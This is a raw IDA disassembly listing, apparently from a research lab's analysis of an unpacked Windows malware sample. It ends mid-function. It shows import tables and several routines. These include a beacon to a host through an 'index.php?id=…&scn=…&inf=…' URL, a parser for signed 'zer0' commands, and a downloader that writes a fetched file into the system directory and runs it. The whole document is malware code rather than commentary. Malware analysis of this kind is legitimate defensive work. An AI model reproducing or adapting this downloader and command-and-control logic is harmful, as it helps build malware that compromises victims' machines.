;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	4A77430A5939C3342092F126787BA551

; File Name   :	u:\work\4a77430a5939c3342092f126787ba551_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	31420000
; Section 1. (virtual address 00001000)
; Virtual size			: 00005000 (  20480.)
; Section size in file		: 00005000 (  20480.)
; Offset to raw	data for section: 00001000
; Flags	E0000080: Bss Executable Readable Writable
; Alignment	: default


unicode		macro page,string,zero
		irpc c,<string>
		db '&c', page
		endm
		ifnb <zero>
		dw zero
		endif
endm

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
UPX0		segment	para public 'CODE' use32
		assume cs:UPX0
		;org 31421000h
		assume es:nothing, ss:nothing, ds:UPX0,	fs:nothing, gs:nothing
dword_31421000	dd 77DDEAF4h	; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004	dd 77DDEBE7h	; resolved to->ADVAPI32.RegSetValueExAdword_31421008	dd 77DD7883h	; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C	dd 77DD761Bh	; resolved to->ADVAPI32.RegOpenKeyExA					; sub_31422882+1Dr
dword_31421010	dd 77DDEDE5h	; resolved to->ADVAPI32.RegDeleteValueAdword_31421014	dd 77DD6BF0h	; resolved to->ADVAPI32.RegCloseKey					; sub_31422882+4Er ...
dword_31421018	dd 77E34D78h	; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C	dd 77DEA2F9h	; resolved to->ADVAPI32.CryptCreateHashdword_31421020	dd 77DEA122h	; resolved to->ADVAPI32.CryptHashDatadword_31421024	dd 77DEAB80h	; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028	dd 77DEA254h	; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C	dd 77DEA544h	; resolved to->ADVAPI32.CryptDestroyKeydword_31421030	dd 77DE8546h	; resolved to->ADVAPI32.CryptReleaseContextdword_31421034	dd 77DE7F96h	; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038	dd 77DEA879h	; resolved to->ADVAPI32.CryptImportKey		align 10h
dword_31421040	dd 7C809AE4h	; resolved to->KERNEL32.VirtualFreedword_31421044	dd 7C809A51h	; resolved to->KERNEL32.VirtualAllocdword_31421048	dd 7C80B4CFh	; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C	dd 7C80BAA1h	; resolved to->KERNEL32.lstrcmpiAdword_31421050	dd 7C8286EEh	; resolved to->KERNEL32.CopyFileAdword_31421054	dd 7C86136Dh	; resolved to->KERNEL32.WinExecdword_31421058	dd 7C864B0Fh	; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C	dd 7C863DE5h	; resolved to->KERNEL32.Process32Firstdword_31421060	dd 7C801E16h	; resolved to->KERNEL32.TerminateProcessdword_31421064	dd 7C863F58h	; resolved to->KERNEL32.Process32Nextdword_31421068	dd 7C80BE01h	; resolved to->KERNEL32.lstrcpyA					; sub_31422B67+8Fr
dword_3142106C	dd 7C8308ADh	; resolved to->KERNEL32.CreateEventAdword_31421070	dd 7C802520h	; resolved to->KERNEL32.WaitForSingleObjectdword_31421074	dd 7C831EABh	; resolved to->KERNEL32.DeleteFileA					; sub_31422A9B+Fr
dword_31421078	dd 7C810D87h	; resolved to->KERNEL32.WriteFiledword_3142107C	dd 7C809B47h	; resolved to->KERNEL32.CloseHandle					; sub_314211A0+F6r ...
dword_31421080	dd 7C801A24h	; resolved to->KERNEL32.CreateFileA					; sub_314221C4+57r
dword_31421084	dd 7C80BDB6h	; resolved to->KERNEL32.lstrlenA					; sub_31421422+64r ...
dword_31421088	dd 7C834D41h	; resolved to->KERNEL32.lstrcatA					; sub_31422A9B+40r
dword_3142108C	dd 7C814EEAh	; resolved to->KERNEL32.GetSystemDirectoryA					; sub_31422A9B+1Br
dword_31421090	dd 7C80D262h	; resolved to->KERNEL32.GetLocaleInfoAdword_31421094	dd 7C802442h	; resolved to->KERNEL32.Sleep					; sub_31421801+16Cr ...
dword_31421098	dd 7C80978Eh	; resolved to->KERNEL32.InterlockedExchangedword_3142109C	dd 7C810111h	; resolved to->KERNEL32.lstrcpynAdword_314210A0	dd 7C80DDF5h	; resolved to->KERNEL32.GetCurrentProcessdword_314210A4	dd 7C80ADA0h	; resolved to->KERNEL32.GetProcAddress					; sub_31421DF0+2Cr
dword_314210A8	dd 7C801D77h	; resolved to->KERNEL32.LoadLibraryA					; sub_314223B2+116r
dword_314210AC	dd 7C80220Fh	; resolved to->KERNEL32.WriteProcessMemorydword_314210B0	dd 7C8309E1h	; resolved to->KERNEL32.OpenProcess					; sub_3142292E+92r
dword_314210B4	dd 7C80B6A1h	; resolved to->KERNEL32.GetModuleHandleA					; UPX0:31422336r
dword_314210B8	dd 7C80929Ch	; resolved to->KERNEL32.GetTickCountdword_314210BC	dd 7C80E93Fh	; resolved to->KERNEL32.CreateMutexAdword_314210C0	dd 7C810637h	; resolved to->KERNEL32.CreateThread					; sub_31421F52+12r
dword_314210C4	dd 7C802367h	; resolved to->KERNEL32.CreateProcessAdword_314210C8	dd 7C80A017h	; resolved to->KERNEL32.SetEventdword_314210CC	dd 7C81320Ch	; resolved to->KERNEL32.OpenEventAdword_314210D0	dd 7C80C058h	; resolved to->KERNEL32.ExitThread					; sub_314221C4+66r ...
dword_314210D4	dd 7C809766h	; resolved to->KERNEL32.InterlockedIncrement					; sub_314225C3+3Fr ...
dword_314210D8	dd 7C80180Eh	; resolved to->KERNEL32.ReadFiledword_314210DC	dd 7C810A77h	; resolved to->KERNEL32.GetFileSizedword_314210E0	dd 7C81CDDAh	; resolved to->KERNEL32.ExitProcess					; sub_31422A9B+C3r
dword_314210E4	dd 7C910331h, 0	; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC	dd 77C371BCh	; resolved to->MSVCRT.sranddword_314210F0	dd 77C46F70h	; resolved to->MSVCRT.memcpydword_314210F4	dd 77C478A0h	; resolved to->MSVCRT.strlendword_314210F8	dd 77C475F0h	; resolved to->MSVCRT.memsetdword_314210FC	dd 77C371D3h	; resolved to->MSVCRT.rand					; sub_31421F73:loc_31421F84r ...
; ---------------------------------------------------------------------------


loc_31421100:				; DATA XREF: UPX0:loc_31422CD0r
		xchg	eax, esp
		pop	esp
		retn
; ---------------------------------------------------------------------------
		db 77h
dword_31421104	dd 77C47C60h	; resolved to->MSVCRT.strstr					; sub_3142207E:loc_314220AFr ...
dword_31421108	dd 77C47660h	; resolved to->MSVCRT.strchr					; sub_31421422+AAr
		align 10h
dword_31421110	dd 7E42DE87h	; resolved to->USER32.FindWindowAdword_31421114	dd 7E41BE4Bh	; resolved to->USER32.GetForegroundWindowdword_31421118	dd 7E418A80h	; resolved to->USER32.GetWindowThreadProcessIddword_3142111C	dd 7E41A8ADh	; resolved to->USER32.wsprintfA					; sub_314215C7+77r ...
		dd 0
dword_31421124	dd 42C30BFAh	; resolved to->WININET.InternetOpenUrlA					; sub_314215C7+9Dr
dword_31421128	dd 42C2C8A1h	; resolved to->WININET.InternetOpenA					; sub_314215C7+89r
dword_3142112C	dd 42C1DAC1h	; resolved to->WININET.InternetCloseHandledword_31421130	dd 42C367F6h	; resolved to->WININET.InternetGetConnectedState					; UPX0:314227A2r
dword_31421134	dd 42C2ABF4h	; resolved to->WININET.InternetReadFile					; sub_314215C7+B0r
		dd 0
dword_3142113C	dd 71AB664Dh	; resolved to->WS2_32.WSAStartupdword_31421140	dd 71AB3E00h	; resolved to->WS2_32.binddword_31421144	dd 71AB88D3h	; resolved to->WS2_32.listendword_31421148	dd 71AC1028h	; resolved to->WS2_32.acceptdword_3142114C	dd 71AB50C8h	; resolved to->WS2_32.gethostnamedword_31421150	dd 71AB94DCh	; resolved to->WS2_32.WSAGetLastErrordword_31421154	dd 71AB4FD4h	; resolved to->WS2_32.gethostbynamedword_31421158	dd 71AB3B91h	; resolved to->WS2_32.socket					; sub_314221C4+ACr
dword_3142115C	dd 71AB3F41h	; resolved to->WS2_32.inet_ntoa					; sub_31422712+Dr
dword_31421160	dd 71AB2B66h	; resolved to->WS2_32.ntohs					; sub_314221C4+F0r
dword_31421164	dd 71AB406Ah	; resolved to->WS2_32.connectdword_31421168	dd 71AB428Ah	; resolved to->WS2_32.send					; sub_3142207E+67r ...
dword_3142116C	dd 71AB615Ah	; resolved to->WS2_32.recv					; sub_31421801+1D8r ...
dword_31421170	dd 71AC0BDEh	; resolved to->WS2_32.shutdown					; sub_3142207E+128r
dword_31421174	dd 71AB9639h	; resolved to->WS2_32.closesocket					; sub_3142207E+12Fr
		align 10h
dword_31421180	dd 0FFFFFFFFh, 0		dd offset nullsub_1
		align 10h
dword_31421190	dd 0FFFFFFFFh, 0		dd offset nullsub_2
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314211A0	proc near		; CODE XREF: sub_31421422+16Dp

var_110		= byte ptr -110h
var_C		= byte ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 110h
		push	ebx
		push	esi
		xor	esi, esi
		push	edi
		push	esi
		push	esi
		push	esi
		push	1
		push	offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE	6.0; Wind"...
		call	dword_31421128	; InternetOpenA
		mov	ebx, eax
		cmp	ebx, esi
		jnz	short loc_314211CB
		push	1
		jmp	loc_31421261
; ---------------------------------------------------------------------------


loc_314211CB:				; CODE XREF: sub_314211A0+22j
		lea	eax, [ebp+var_110]
		push	104h
		push	eax
		call	dword_3142108C	; GetSystemDirectoryA
		mov	edi, dword_31421088
		lea	eax, [ebp+var_110]
		push	offset dword_314241F8
		push	eax
		call	edi	; lstrcatA
		lea	eax, [ebp+var_110]
		push	6
		push	eax
		call	dword_31421084	; lstrlenA
		lea	eax, [ebp+eax+var_110]
		push	eax
		call	sub_31421F73
		pop	ecx
		lea	eax, [ebp+var_110]
		pop	ecx
		push	offset dword_314241F0
		push	eax
		call	edi	; lstrcatA
		push	esi
		push	esi
		push	2
		push	esi
		push	esi
		lea	eax, [ebp+var_110]
		push	40000000h
		push	eax
		call	dword_31421080	; CreateFileA
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_4], eax
		jnz	short loc_31421241
		push	2
		jmp	short loc_31421261
; ---------------------------------------------------------------------------


loc_31421241:				; CODE XREF: sub_314211A0+9Bj
		push	esi
		push	esi
		push	esi
		push	esi
		push	[ebp+arg_0]
		push	ebx
		call	dword_31421124	; InternetOpenUrlA
		cmp	eax, esi
		mov	[ebp+arg_0], eax
		jnz	short loc_31421264
		push	[ebp+var_4]
		call	dword_3142107C	; CloseHandle
		push	3


loc_31421261:				; CODE XREF: sub_314211A0+26j
					; sub_314211A0+9Fj
		pop	eax
		jmp	short loc_314212B5
; ---------------------------------------------------------------------------


loc_31421264:				; CODE XREF: sub_314211A0+B4j
		mov	edi, 100000h
		push	edi
		call	sub_31422CA5
		mov	ebx, eax
		pop	ecx
		lea	eax, [ebp+var_8]
		push	eax
		push	edi
		push	ebx
		push	[ebp+arg_0]
		call	dword_31421134	; InternetReadFile
		lea	eax, [ebp+var_C]
		push	esi
		push	eax
		push	[ebp+var_8]
		push	ebx
		push	[ebp+var_4]
		call	dword_31421078	; WriteFile
		push	[ebp+var_4]
		call	dword_3142107C	; CloseHandle
		lea	eax, [ebp+var_110]
		push	5
		push	eax
		call	sub_31421FA3
		push	ebx
		call	sub_31422CB9
		add	esp, 0Ch
		xor	eax, eax


loc_314212B5:				; CODE XREF: sub_314211A0+C2j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_314211A0	endp


; =============== S U B	R O U T	I N E =======================================



sub_314212BA	proc near		; CODE XREF: sub_31421422+F8p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= byte ptr  0Ch

		mov	ecx, [esp+arg_4]
		mov	eax, [esp+arg_0]
		push	ebx
		push	esi
		push	edi
		or	edi, 0FFFFFFFFh
		inc	eax
		push	0Fh
		lea	esi, [ecx+1]
		sub	edi, ecx
		pop	ecx


loc_314212D1:				; CODE XREF: sub_314212BA+56j
		mov	dl, [eax]
		mov	bl, [eax-1]
		add	edx, ecx
		add	bl, cl
		sar	edx, 4
		and	dl, 3
		sub	dl, [esp+0Ch+arg_8]
		shl	bl, 2
		or	dl, bl
		mov	[esi-1], dl
		mov	dl, [eax+1]
		mov	bl, [eax]
		dec	dl
		add	bl, cl
		and	dl, cl
		sub	dl, [esp+0Ch+arg_8]
		add	eax, 3
		shl	bl, 4
		and	bl, 0F0h
		or	dl, bl
		mov	[esi], dl
		inc	esi
		inc	esi
		lea	edx, [edi+esi]
		cmp	edx, 30h
		jl	short loc_314212D1
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_314212BA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421316	proc near		; CODE XREF: sub_3142139B+27p

var_38		= byte ptr -38h
var_1C		= byte ptr -1Ch
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		push	ebx
		push	esi
		push	edi
		push	6
		pop	ecx
		mov	esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
		lea	edi, [ebp+var_1C]
		push	6
		rep movsd
		movsw
		movsb
		pop	ecx
		mov	esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
		lea	edi, [ebp+var_38]
		mov	ebx, [ebp+arg_4]
		rep movsd
		movsw
		test	ebx, ebx
		movsb
		jge	short loc_31421349
		add	ebx, 1Ah


loc_31421349:				; CODE XREF: sub_31421316+2Ej
		movsx	edi, [ebp+arg_0]
		mov	esi, dword_31421108
		lea	eax, [ebp+var_1C]
		push	edi
		push	eax
		call	esi	; strchr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_31421373
		lea	ecx, [ebp+var_1C]
		push	1Ah
		sub	eax, ecx
		pop	ecx
		add	eax, ebx
		cdq
		idiv	ecx
		mov	al, [ebp+edx+var_1C]
		jmp	short loc_31421396
; ---------------------------------------------------------------------------


loc_31421373:				; CODE XREF: sub_31421316+48j
		lea	eax, [ebp+var_38]
		push	edi
		push	eax
		call	esi	; strchr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_31421393
		lea	ecx, [ebp+var_38]
		push	1Ah
		sub	eax, ecx
		pop	ecx
		add	eax, ebx
		cdq
		idiv	ecx
		mov	al, [ebp+edx+var_38]
		jmp	short loc_31421396
; ---------------------------------------------------------------------------


loc_31421393:				; CODE XREF: sub_31421316+68j
		mov	al, [ebp+arg_0]


loc_31421396:				; CODE XREF: sub_31421316+5Bj
					; sub_31421316+7Bj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_31421316	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142139B	proc near		; CODE XREF: sub_31421422+D6p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	al, [eax]
		test	al, al
		jz	short loc_314213F8
		mov	edi, [ebp+arg_0]
		push	ebx


loc_314213B0:				; CODE XREF: sub_3142139B+58j
		sub	al, 2
		inc	[ebp+arg_4]
		mov	bl, al
		mov	eax, esi
		neg	eax
		mov	byte ptr [ebp+arg_0], bl
		push	eax
		push	[ebp+arg_0]
		call	sub_31421316
		mov	[edi], al
		pop	ecx
		inc	edi
		cmp	bl, 61h
		pop	ecx
		jl	short loc_314213DC
		cmp	bl, 7Ah
		jg	short loc_314213DC
		movsx	esi, bl
		sub	esi, 61h


loc_314213DC:				; CODE XREF: sub_3142139B+34j
					; sub_3142139B+39j
		cmp	bl, 41h
		jl	short loc_314213EC
		cmp	bl, 5Ah
		jg	short loc_314213EC
		movsx	esi, bl
		sub	esi, 41h


loc_314213EC:				; CODE XREF: sub_3142139B+44j
					; sub_3142139B+49j
		mov	eax, [ebp+arg_4]
		mov	al, [eax]
		test	al, al
		jnz	short loc_314213B0
		pop	ebx
		jmp	short loc_314213FB
; ---------------------------------------------------------------------------


loc_314213F8:				; CODE XREF: sub_3142139B+Fj
		mov	edi, [ebp+arg_0]


loc_314213FB:				; CODE XREF: sub_3142139B+5Bj
		and	byte ptr [edi],	0
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_3142139B	endp


; =============== S U B	R O U T	I N E =======================================



sub_31421402	proc near		; CODE XREF: sub_31421422+104p

arg_0		= dword	ptr  4

		xor	eax, eax
		xor	ecx, ecx


loc_31421406:				; CODE XREF: sub_31421402+12j
		mov	edx, [esp+arg_0]
		movzx	edx, byte ptr [ecx+edx]
		add	eax, edx
		inc	ecx
		cmp	ecx, 30h
		jl	short loc_31421406
		push	1Ah
		cdq
		pop	ecx
		idiv	ecx
		mov	eax, edx
		add	eax, 61h
		retn
sub_31421402	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421422	proc near		; CODE XREF: sub_314215C7+BAp

var_174		= dword	ptr -174h
var_170		= byte ptr -170h
var_168		= byte ptr -168h
var_164		= byte ptr -164h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= byte ptr -124h
var_11C		= byte ptr -11Ch
var_1C		= dword	ptr -1Ch
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	offset dword_31421180
		push	offset loc_31422CD0
		mov	eax, large fs:0
		push	eax
		mov	large fs:0, esp
		sub	esp, 164h
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_128], 1
		and	[ebp+var_4], 0
		push	offset aZer0	; "zer0"
		push	[ebp+arg_0]
		call	dword_31421104	; strstr
		pop	ecx
		pop	ecx
		mov	edi, eax
		mov	[ebp+var_130], edi
		test	edi, edi
		jz	loc_314215A8
		add	edi, 4
		mov	[ebp+var_130], edi
		jz	loc_314215A8
		push	edi
		call	dword_31421084	; lstrlenA
		mov	[ebp+var_1C], eax
		cmp	eax, 50h
		jle	loc_314215A8
		and	byte ptr [edi+100h], 0
		mov	al, [edi]
		mov	[ebp+var_168], al
		movsx	ebx, al
		sub	ebx, 61h
		mov	[ebp+var_12C], ebx
		js	loc_314215A8
		cmp	ebx, 1Ah
		jge	loc_314215A8
		inc	edi
		mov	[ebp+var_130], edi
		push	7Eh
		push	edi
		call	dword_31421108	; strchr
		pop	ecx
		pop	ecx
		mov	esi, eax
		mov	[ebp+var_134], esi
		test	esi, esi
		jz	loc_314215A8
		mov	al, [esi]
		mov	[ebp+var_170], al
		and	byte ptr [esi],	0
		push	ebx
		push	edi
		lea	eax, [ebp+var_11C]
		push	eax
		call	sub_3142139B
		mov	al, [ebp+var_170]
		mov	[esi], al
		inc	esi
		mov	[ebp+var_130], esi
		xor	edi, edi
		push	edi
		lea	eax, [ebp+var_164]
		push	eax
		lea	eax, [esi+1]
		push	eax
		call	sub_314212BA
		lea	eax, [ebp+var_164]
		push	eax
		call	sub_31421402
		add	esp, 1Ch
		cmp	[esi], al
		jnz	short loc_314215A8
		push	44h
		push	offset dword_31424000
		lea	eax, [ebp+var_124]
		push	eax
		call	sub_3142172F
		add	esp, 0Ch
		lea	eax, [ebp+var_174]
		push	eax
		push	30h
		lea	eax, [ebp+var_164]
		push	eax
		lea	eax, [ebp+var_11C]
		push	eax
		call	dword_31421084	; lstrlenA
		push	eax
		lea	eax, [ebp+var_11C]
		push	eax
		lea	eax, [ebp+var_124]
		push	eax
		call	sub_3142179A
		add	esp, 18h
		test	eax, eax
		jnz	short loc_3142159B
		cmp	[ebp+var_174], edi
		jz	short loc_3142159B
		lea	eax, [ebp+var_11C]
		push	eax
		call	sub_314211A0
		pop	ecx
		mov	[ebp+var_128], edi


loc_3142159B:				; CODE XREF: sub_31421422+15Cj
					; sub_31421422+164j
		lea	eax, [ebp+var_124]
		push	eax
		call	sub_3142177E
		pop	ecx


loc_314215A8:				; CODE XREF: sub_31421422+4Ej
					; sub_31421422+5Dj ...
		or	[ebp+var_4], 0FFFFFFFFh
		call	nullsub_1
		mov	eax, [ebp+var_128]
		mov	ecx, [ebp+var_10]
		mov	large fs:0, ecx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_31421422	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_314215C7	proc near		; CODE XREF: sub_314216A2+2Ap

var_E8		= byte ptr -0E8h
var_84		= byte ptr -84h
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 0E8h
		push	ebx
		push	esi
		push	edi
		push	4000h
		call	sub_31422CA5
		pop	ecx
		mov	esi, eax
		lea	eax, [ebp+var_E8]
		push	63h
		push	eax
		push	7
		push	400h
		call	dword_31421090	; GetLocaleInfoA
		xor	ebx, ebx
		cmp	byte ptr [ebp+arg_4], bl
		jz	short loc_3142162F
		lea	eax, [ebp+var_E8]
		push	eax
		lea	eax, [ebp+var_84]
		push	dword_31424FEC
		push	dword_31425004
		push	offset aFgnsdrjyrsert ;	"fgnsdrjyrsert"
		push	[ebp+arg_0]
		push	offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
		push	eax
		call	dword_3142111C	; wsprintfA
		add	esp, 1Ch
		jmp	short loc_31421647
; ---------------------------------------------------------------------------


loc_3142162F:				; CODE XREF: sub_314215C7+34j
		push	[ebp+arg_0]
		lea	eax, [ebp+var_84]
		push	offset aHttpS	; "http://%s"
		push	eax
		call	dword_3142111C	; wsprintfA
		add	esp, 0Ch


loc_31421647:				; CODE XREF: sub_314215C7+66j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE	6.0; Wind"...
		call	dword_31421128	; InternetOpenA
		push	ebx
		mov	edi, eax
		push	ebx
		push	ebx
		lea	eax, [ebp+var_84]
		push	ebx
		push	eax
		push	edi
		call	dword_31421124	; InternetOpenUrlA
		mov	ebx, eax
		lea	eax, [ebp+var_4]
		push	eax
		push	2000h
		push	esi
		push	ebx
		call	dword_31421134	; InternetReadFile
		push	esi
		mov	[ebp+arg_4], eax
		call	sub_31421422
		push	esi
		call	sub_31422CB9
		mov	esi, dword_3142112C
		pop	ecx
		pop	ecx
		push	ebx
		call	esi	; InternetCloseHandle
		push	edi
		call	esi	; InternetCloseHandle
		mov	eax, [ebp+arg_4]
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_314215C7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_314216A2	proc near		; DATA XREF: sub_314223B2+15Bo
		push	ebx
		mov	ebx, dword_31421098
		push	esi
		push	edi


loc_314216AB:				; CODE XREF: sub_314216A2+88j
		xor	esi, esi
		mov	edi, 46021h


loc_314216B2:				; CODE XREF: sub_314216A2+86j
		inc	esi
		inc	esi
		call	sub_31422038
		test	eax, eax
		jz	short loc_314216FC
		mov	al, byte_31424080[esi+esi*4]
		push	eax
		push	off_31424081[esi+esi*4]
		call	sub_314215C7
		or	eax, edi
		pop	ecx
		xor	eax, 8064h
		pop	ecx
		shl	eax, 3
		mov	edi, eax
		xor	eax, 228h
		test	ax, 0FFFFh
		jnz	short loc_314216FC
		push	0
		push	offset dword_31425004
		call	ebx	; InterlockedExchange
		push	0
		push	offset dword_31424FEC
		call	ebx	; InterlockedExchange


loc_314216FC:				; CODE XREF: sub_314216A2+19j
					; sub_314216A2+46j
		call	dword_314210FC	; rand
		push	3
		cdq
		pop	ecx
		idiv	ecx
		add	esi, edx
		call	sub_31422068
		xor	edx, edx
		mov	ecx, 493E0h
		div	ecx
		add	edx, 61B48h
		push	edx
		call	dword_31421094	; Sleep
		cmp	esi, 16h
		jb	short loc_314216B2
		jmp	loc_314216AB
sub_314216A2	endp


; =============== S U B	R O U T	I N E =======================================



sub_3142172F	proc near		; CODE XREF: sub_31421422+11Ep

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		mov	esi, dword_31421034
		push	edi
		xor	edi, edi
		push	edi
		push	1
		push	edi
		push	edi
		push	ebx
		call	esi	; CryptAcquireContextA
		test	eax, eax
		jnz	short loc_3142175C
		push	8
		push	1
		push	edi
		push	edi
		push	ebx
		call	esi	; CryptAcquireContextA
		test	eax, eax
		jnz	short loc_3142175C
		push	1
		pop	eax
		jmp	short loc_3142177A
; ---------------------------------------------------------------------------


loc_3142175C:				; CODE XREF: sub_3142172F+19j
					; sub_3142172F+26j
		lea	eax, [ebx+4]
		push	eax
		push	edi
		push	edi
		push	[esp+18h+arg_8]
		push	[esp+1Ch+arg_4]
		push	dword ptr [ebx]
		call	dword_31421038	; CryptImportKey
		neg	eax
		sbb	eax, eax
		and	al, 0FEh
		inc	eax
		inc	eax


loc_3142177A:				; CODE XREF: sub_3142172F+2Bj
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_3142172F	endp


; =============== S U B	R O U T	I N E =======================================



sub_3142177E	proc near		; CODE XREF: sub_31421422+180p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	dword ptr [esi+4]
		call	dword_3142102C	; CryptDestroyKey
		push	0
		push	dword ptr [esi]
		call	dword_31421030	; CryptReleaseContext
		xor	eax, eax
		pop	esi
		retn
sub_3142177E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_3142179A	proc near		; CODE XREF: sub_31421422+152p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		lea	eax, [ebp+arg_0]
		xor	edi, edi
		push	eax
		push	edi
		push	edi
		push	8003h
		push	dword ptr [esi]
		call	dword_3142101C	; CryptCreateHash
		test	eax, eax
		jnz	short loc_314217C0
		push	1
		pop	eax
		jmp	short loc_314217FD
; ---------------------------------------------------------------------------


loc_314217C0:				; CODE XREF: sub_3142179A+1Fj
		push	edi
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_31421020	; CryptHashData
		test	eax, eax
		jnz	short loc_314217D9
		push	2
		pop	edi
		jmp	short loc_314217F2
; ---------------------------------------------------------------------------


loc_314217D9:				; CODE XREF: sub_3142179A+38j
		push	edi
		push	edi
		push	dword ptr [esi+4]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_0]
		call	dword_31421024	; CryptVerifySignatureA
		mov	ecx, [ebp+arg_14]
		mov	[ecx], eax


loc_314217F2:				; CODE XREF: sub_3142179A+3Dj
		push	[ebp+arg_0]
		call	dword_31421028	; CryptDestroyHash
		mov	eax, edi


loc_314217FD:				; CODE XREF: sub_3142179A+24j
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_3142179A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_31421801	proc near		; CODE XREF: sub_3142255F+36p
					; sub_314225C3+48p ...

var_89E4	= byte ptr -89E4h
var_897C	= byte ptr -897Ch
var_690C	= byte ptr -690Ch
var_689C	= byte ptr -689Ch
var_5DD8	= byte ptr -5DD8h
var_4834	= byte ptr -4834h
var_4833	= byte ptr -4833h
var_37A0	= byte ptr -37A0h
var_2CDC	= byte ptr -2CDCh
var_2CDB	= byte ptr -2CDBh
var_2CD8	= byte ptr -2CD8h
var_24F4	= byte ptr -24F4h
var_24E4	= byte ptr -24E4h
var_21C0	= byte ptr -21C0h
var_21BC	= byte ptr -21BCh
var_21B0	= byte ptr -21B0h
var_1F28	= byte ptr -1F28h
var_1EAC	= byte ptr -1EACh
var_16DC	= byte ptr -16DCh
var_1231	= byte ptr -1231h
var_F44		= byte ptr -0F44h
var_EA4		= byte ptr -0EA4h
var_798		= dword	ptr -798h
var_788		= byte ptr -788h
var_774		= byte ptr -774h
var_730		= byte ptr -730h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_E4		= byte ptr -0E4h
var_E1		= byte ptr -0E1h
var_B7		= byte ptr -0B7h
var_B5		= byte ptr -0B5h
var_B4		= byte ptr -0B4h
var_6C		= byte ptr -6Ch
var_4C		= byte ptr -4Ch
var_24		= word ptr -24h
var_22		= word ptr -22h
var_20		= dword	ptr -20h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_6		= byte ptr -6
var_5		= byte ptr -5
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, 89E4h
		call	sub_31422CF0
		mov	eax, dword_31424C84
		push	ebx
		push	edi
		push	1
		pop	edi
